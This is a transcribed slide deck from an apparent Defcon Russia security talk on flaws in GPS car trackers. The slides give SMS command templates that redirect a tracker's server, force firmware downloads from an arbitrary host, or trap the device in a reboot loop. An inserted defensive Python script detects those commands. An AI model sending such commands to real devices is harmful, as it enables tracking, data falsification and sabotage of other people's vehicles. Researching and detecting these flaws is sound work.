Chastukhin, cherbov where is my car dude
defconrussia -
![Page 1: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/1.jpg)
Where is my car, dude?!
Dmitry Chastuhin
Gleb Cherbov
![Page 2: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/2.jpg)
About
Dmitry chipik Chastuhin
Yet another security researcher
@_chipik
![Page 3: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/3.jpg)
About
Gleb Cherbov
• Digital security
• Defcon Russia 7812
@cherboff
![Page 4: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/4.jpg)
![Page 5: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/5.jpg)
![Page 6: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/6.jpg)
So what?
GSM channel, GPS, Server side, Device
Fake BTS
Jammers
?
![Page 7: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/7.jpg)
Tracker
![Page 8: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/8.jpg)
Attack. Information disclosure
![Page 9: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/9.jpg)
Attack. XSS
![Page 10: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/10.jpg)
Attack. SQL injection
![Page 11: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/11.jpg)
PROFIT?
All your cars
prisoners
children
are belong to us…
![Page 12: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/12.jpg)
Too simple…
![Page 13: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/13.jpg)
So what?
• GSM channel: Fake BTS
• GPS: Jammers
• Server side: OWASP top 9000
• Device: ?
![Page 14: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/14.jpg)
[Figure: labelled components: GSM/GPRS; GPS; Power/peripheral RS-232; Mic/speaker; SIM; ARM; GPS ant.]
![Page 15: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/15.jpg)
How to interact with?
• RS-232 – configuration, firmware update
• SMS – configuration, data exchange
• GPRS – data exchange, configuration, firmware update
• Voice call – just for voice calling =)
![Page 16: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/16.jpg)
SMS configuration requires authentication…
…but who uses it?
![Page 17: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/17.jpg)
…In numbers
• 43: secure
• 22: no password
• 11: "123"-like login/pass
![Page 18: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/18.jpg)
MiTM
setparam 3245 <IP>
setparam 3246 <Port>
Change any sent parameter:
• coordinates
• speed
• fuel level
![Page 19: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/19.jpg)
DEMO
![Page 20: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/20.jpg)
Firmware update through SMS
• Just send an SMS: BOOT <IMEI> <APN setting> <ip:port> <filename>
…and the device tries to load ip:port\filename and update its own firmware
Without any authentication!
![Page 21: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/21.jpg)
DoS through SMS
• Just send an SMS: BOOT <IMEI>
…and the device will reboot into an infinite updater loop
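A defender-side check for the SMS commands shown on the MiTM, firmware update and DoS slides, as an added example that is not from the talk: it scans SMS delivered to tracker SIMs for changes to the server parameters 3245/3246 and for BOOT commands. The log format, the expected server address and the trusted sender list are assumptions.

```python
import re

# Assumptions (placeholders, not values from the talk): the fleet's real
# telemetry endpoint and the numbers allowed to send configuration SMS.
EXPECTED = {"3245": "203.0.113.10", "3246": "9000"}   # IP, port parameters
TRUSTED_SENDERS = {"+70000000001"}

SETPARAM = re.compile(r"\bsetparam\s+(3245|3246)\s+(\S+)", re.I)
BOOT = re.compile(r"^\s*BOOT\s+(\d{15})\b\s*(.*)$", re.I)

def classify(sender, text):
    """Return the findings for one SMS delivered to a tracker SIM."""
    findings = []
    # Any change of the reporting server away from the expected endpoint
    # lets a third party sit between the device and the backend.
    for param, value in SETPARAM.findall(text):
        if value != EXPECTED[param]:
            findings.append(f"server-redirect: param {param} -> {value}")
    m = BOOT.match(text)
    if m:
        # With a source the device fetches firmware; without one it reboots
        # into the updater loop described on the DoS slide.
        kind = "firmware-update" if m.group(2).strip() else "boot-without-source"
        findings.append(f"{kind}: IMEI {m.group(1)}")
    if findings and sender not in TRUSTED_SENDERS:
        findings.append("untrusted-sender")
    return findings

def scan(log_lines):
    """Parse 'timestamp|sender|text' lines; return only the flagged ones."""
    alerts = []
    for line in log_lines:
        ts, sender, text = line.rstrip("\n").split("|", 2)
        findings = classify(sender, text)
        if findings:
            alerts.append((ts, sender, findings))
    return alerts

# Constructed sample log (hypothetical export format, documentation addresses).
SAMPLE_LOG = [
    "2014-01-01T10:00:00|+70000000001|setparam 3245 203.0.113.10",
    "2014-01-01T10:05:00|+70000000099|setparam 3245 198.51.100.7",
    "2014-01-01T10:06:00|+70000000099|BOOT 000000000000000 apn.example 198.51.100.7:8080 fw.bin",
    "2014-01-01T10:07:00|+70000000099|BOOT 000000000000000",
]

if __name__ == "__main__":
    for ts, sender, findings in scan(SAMPLE_LOG):
        print(ts, sender, "; ".join(findings))
```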
![Page 22: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/22.jpg)
Questions?